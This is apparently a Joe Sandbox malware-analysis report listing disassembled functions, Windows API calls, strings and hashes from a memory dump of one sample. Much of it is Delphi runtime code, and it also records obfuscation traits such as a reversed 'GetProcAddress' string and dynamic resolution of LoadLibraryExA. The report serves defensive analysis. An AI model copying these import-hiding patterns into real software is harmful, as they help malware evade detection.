GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A762

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction ID: 83f0d6fdb0758873247ad90feb94a415d544e6d6052c02030ef656ab1ab28617
Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction Fuzzy Hash: D4E0D836B0021827D712A5685C819FA735D979C350F00427EBD45C7340EDA09D404EE8

Function 0293B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,0295D106,00000000,0295D11E), ref: 0293B71A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: bda15525350472d75150a8ea5c39715b9ee1ba082f05d4d8a7096182f346982d
Instruction ID: cbae950d00e0895d7fe0e22971cd97c15ab5d393de5d93e27f382c11c7aec403
Opcode Fuzzy Hash: bda15525350472d75150a8ea5c39715b9ee1ba082f05d4d8a7096182f346982d
Instruction Fuzzy Hash: BFF01274A083119FD340DF28D541A267BE9FB88B04F008D29EAD9C7380E7369A24CF52

Function 0293A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0293BDF2,00000000,0293C00B,?,?,00000000,00000000), ref: 0293A7A3

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction ID: 3ef63d6605109d5ffcf4921dc56b60232aa48f59acdef9a410b8843372a3730c
Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction Fuzzy Hash: 53D05EA630E2603AA225915A2D84D7B5AFCCAC57A1F00443EF589C6200D2048C0596F1

Function 0293918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02939190

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction ID: a80ca6194bf17a763ffba3eb98e34fce3d80349a3233ec0a2657e2b4c4fa6aa7
Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction Fuzzy Hash: EEA01100808C20228A803B2A0C0223A3088A880B20FC80F80A8F8802E0EE2E022080EB

Function 029320C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 0293D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0293D21D

Part of subcall function 0293D1E8: GetProcAddress.KERNEL32(00000000), ref: 0293D201

Strings

VarSub, xrefs: 0293D283
VarAnd, xrefs: 0293D2F1
VarR4FromStr, xrefs: 0293D35F
VarMul, xrefs: 0293D299
VarBstrFromCy, xrefs: 0293D3CD
oleaut32.dll, xrefs: 0293D218
VarXor, xrefs: 0293D31D
VarNot, xrefs: 0293D257
VarBstrFromBool, xrefs: 0293D3F9
VarBstrFromDate, xrefs: 0293D3E3
VarDateFromStr, xrefs: 0293D38B
VarDiv, xrefs: 0293D2AF
VarCmp, xrefs: 0293D333
VarIdiv, xrefs: 0293D2C5
VarMod, xrefs: 0293D2DB
VarCyFromStr, xrefs: 0293D3A1
VarBoolFromStr, xrefs: 0293D3B7
VarR8FromStr, xrefs: 0293D375
VarOr, xrefs: 0293D307
VarNeg, xrefs: 0293D241
VarI4FromStr, xrefs: 0293D349
VarAdd, xrefs: 0293D26D
VariantChangeTypeEx, xrefs: 0293D22B

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: e2dc9f540269e046e7102f98a7004c2276a63ffb1b014e4b42cf0a3789e62b0c
Instruction ID: 7ef6443d518c95c9f4d3497429fb61607f1b8a2d43ba43645d8b8752a59718cc
Opcode Fuzzy Hash: e2dc9f540269e046e7102f98a7004c2276a63ffb1b014e4b42cf0a3789e62b0c
Instruction Fuzzy Hash: C741CA61E897086B560E6BAD742443B7BDEDBC87303A0441BF818DB784DE70BD614BB9

Function 02946E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02946E5E
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02946E6F
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02946E7F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02946E8F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02946E9F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02946EAF
GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02946EBF

Strings

CoAddRefServerProcess, xrefs: 02946E89
CoResumeClassObjects, xrefs: 02946EA9
CoInitializeEx, xrefs: 02946E79
CoCreateInstanceEx, xrefs: 02946E69
ole32.dll, xrefs: 02946E59
CoReleaseServerProcess, xrefs: 02946E99
CoSuspendClassObjects, xrefs: 02946EB9

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: c02c785ce54d2a9ebd715d76b4823b0da8452ee7d6e73ccb60e2d47d843c7284
Instruction ID: 40adfb2f3f9b33d00a30244fd6911e5ddf8dd4c1062c471e77f438b3a0a735a7
Opcode Fuzzy Hash: c02c785ce54d2a9ebd715d76b4823b0da8452ee7d6e73ccb60e2d47d843c7284
Instruction Fuzzy Hash: CCF0C0E6B887217EB3027F719C81C372B9DE5C1B4C3001865B48255582DE76C5204F54

Function 02932530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029328CE

Strings

String, xrefs: 029327A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02932849
The unexpected small block leaks are:, xrefs: 02932707
, xrefs: 02932814
bytes: , xrefs: 0293275D
7, xrefs: 029326A1
Unexpected Memory Leak, xrefs: 029328C0
Unknown, xrefs: 0293278C
An unexpected memory leak has occurred. , xrefs: 02932690

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 6eb611f46a9a24b8dbc91c6169b70e8cfd9f9f2eabd9f87e4ec42bb3c9ca0861
Instruction ID: e36733be5d7a493c561bf0ab717b9b49b95977a5108dce65efe295998069d053
Opcode Fuzzy Hash: 6eb611f46a9a24b8dbc91c6169b70e8cfd9f9f2eabd9f87e4ec42bb3c9ca0861
Instruction Fuzzy Hash: 2CA1E330E043648BDF22AB2CCC80B99B7E9EB49754F1440E5DD49AB285CB759EC9CF51

Function 0293252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 02932849
The unexpected small block leaks are:, xrefs: 02932707
, xrefs: 02932814
bytes: , xrefs: 0293275D
7, xrefs: 029326A1
Unexpected Memory Leak, xrefs: 029328C0
An unexpected memory leak has occurred. , xrefs: 02932690

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 444fa5386843aa4731a6a07490aaf1a1d6dd03e016ac3c28fbe9b2645d69eb77
Instruction ID: 290e6763fdbad10453e7d06f3404e7234c6e228e9b29328a17456908749f0b4d
Opcode Fuzzy Hash: 444fa5386843aa4731a6a07490aaf1a1d6dd03e016ac3c28fbe9b2645d69eb77
Instruction Fuzzy Hash: 3971A030E042A88FDB22AB2CCC84BD9BAE9FB49714F1441E5D949DB281DB758EC5CF51

Function 0293BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0293C00B,?,?,00000000,00000000), ref: 0293BD76

Part of subcall function 0293A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A762

Strings

mmmm d, yyyy, xrefs: 0293BE72
:mm:ss, xrefs: 0293BFC6
AMPM , xrefs: 0293BF99
AMPM, xrefs: 0293BF8A
:mm, xrefs: 0293BFA9
m/d/yy, xrefs: 0293BE45

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: dc58732403532c10353bdb3f0cca57fea18c9d31feefb54c1848eb5f223cf898
Instruction ID: fd83d9fa53c061e92e6651b435f313774ed36830b5e9f03aff949ca710b9373c
Opcode Fuzzy Hash: dc58732403532c10353bdb3f0cca57fea18c9d31feefb54c1848eb5f223cf898
Instruction Fuzzy Hash: BE614F35B002899BDB06EBA9D890BDF77F7ABC8310F109435E105EB345CA39D9059B51

Function 0294AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AE38
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0294AE4F
IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AEE3
IsBadReadPtr.KERNEL32(?,00000002), ref: 0294AEEF
IsBadReadPtr.KERNEL32(?,00000014), ref: 0294AF03

Strings

LoadLibraryExA, xrefs: 0294AE45
KernelBase, xrefs: 0294AE4A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 0921f063334a83c7f2c11ed8c953cd0cce9415991f182d0394d79aca83f0d809
Instruction ID: 7a75d4e4bfd7c044ef03cb41f06a25d717882cc1149bc97ab0bcc53a437f464d
Opcode Fuzzy Hash: 0921f063334a83c7f2c11ed8c953cd0cce9415991f182d0394d79aca83f0d809
Instruction Fuzzy Hash: CB3120B2A80205BBEB20DF68CC95F9B77ACAF44768F004554FA549B280DB74E950DBA4

Function 0293432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029917C8,?,?,0295E7A8,0293655D,0295D30D), ref: 02934365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029917C8,?,?,0295E7A8,0293655D,0295D30D), ref: 0293436B
GetStdHandle.KERNEL32(000000F5,029343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029917C8), ref: 02934380
WriteFile.KERNEL32(00000000,000000F5,029343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?), ref: 02934386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029343A4

Strings

Error, xrefs: 02934398
Runtime error at 00000000, xrefs: 0293435E, 0293439D

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 6de9e8893b7bb89b29867bac72b1c5d04dbd1b9dd2a9816d5faab303b13aa489
Instruction ID: a6255c9b3514e2d0b163e1ea10faedf04426a955d603c328c6c0ff6ac022f565
Opcode Fuzzy Hash: 6de9e8893b7bb89b29867bac72b1c5d04dbd1b9dd2a9816d5faab303b13aa489
Instruction Fuzzy Hash: BCF09065AC83407AFA12A7A0AD05FA9275D4B84B24F585A05F664E64D0C7B090C48B67

Function 0293AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0293ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACD9
Part of subcall function 0293ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293ACFD
Part of subcall function 0293ACBC: GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD18
Part of subcall function 0293ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADAE

CharToOemA.USER32(?,?), ref: 0293AE7B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0293AE98
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AE9E
GetStdHandle.KERNEL32(000000F4,0293AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEB3
WriteFile.KERNEL32(00000000,000000F4,0293AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEB9
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0293AEDB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0293AEF1

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: ae34b0684d2174a7a4b2f4483f63644a86045fe29c08bd158182d05fc8e2f93d
Instruction ID: b3a43993cf1c831f1134a0a205ba2f8d38c9448c92ba5a0751ca96bce1e4e1b8
Opcode Fuzzy Hash: ae34b0684d2174a7a4b2f4483f63644a86045fe29c08bd158182d05fc8e2f93d
Instruction Fuzzy Hash: 38118EB2548300BED302EBA4CC80F9F77EDAB88340F400929B394D60D0DA74E9448F7A

Function 0293E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0293E5A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0293E5C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0293E5FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0293E677
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0293E690
VariantCopy.OLEAUT32(?,00000000), ref: 0293E6C5

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: adf44ce7d9af2aff34248c922e474308c8e5bcd69803ecec57e09070a4d76393
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 6351D6769006299BCB26DB98CC90BD9B7FDAF8D304F0041E5E649E7215DB30AF858F61

Function 02933568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0293358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029335BD
RegCloseKey.ADVAPI32(?,029335E0,00000000,?,00000004,00000000,029335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029335D3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02933580
FPUMaskValue, xrefs: 029335B4

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 74aa2c4347fbfcf8fabf6bbde404a7a56949180b09484560a5bd8f69861d651e
Instruction ID: e07ebbb7a3102df605325f7713769a990bed1156e40f7f61080a94fe916111f1
Opcode Fuzzy Hash: 74aa2c4347fbfcf8fabf6bbde404a7a56949180b09484560a5bd8f69861d651e
Instruction Fuzzy Hash: 5C01D876A84318BAF712DBA0CD02BBD77ECEB48710F1005A1FE04D65C0E675A610DB99

Function 029480C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
GetProcAddress.KERNEL32(?,?), ref: 02948125

Strings

sserddAcorPteG, xrefs: 029480DB
Kernel32, xrefs: 02948108

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
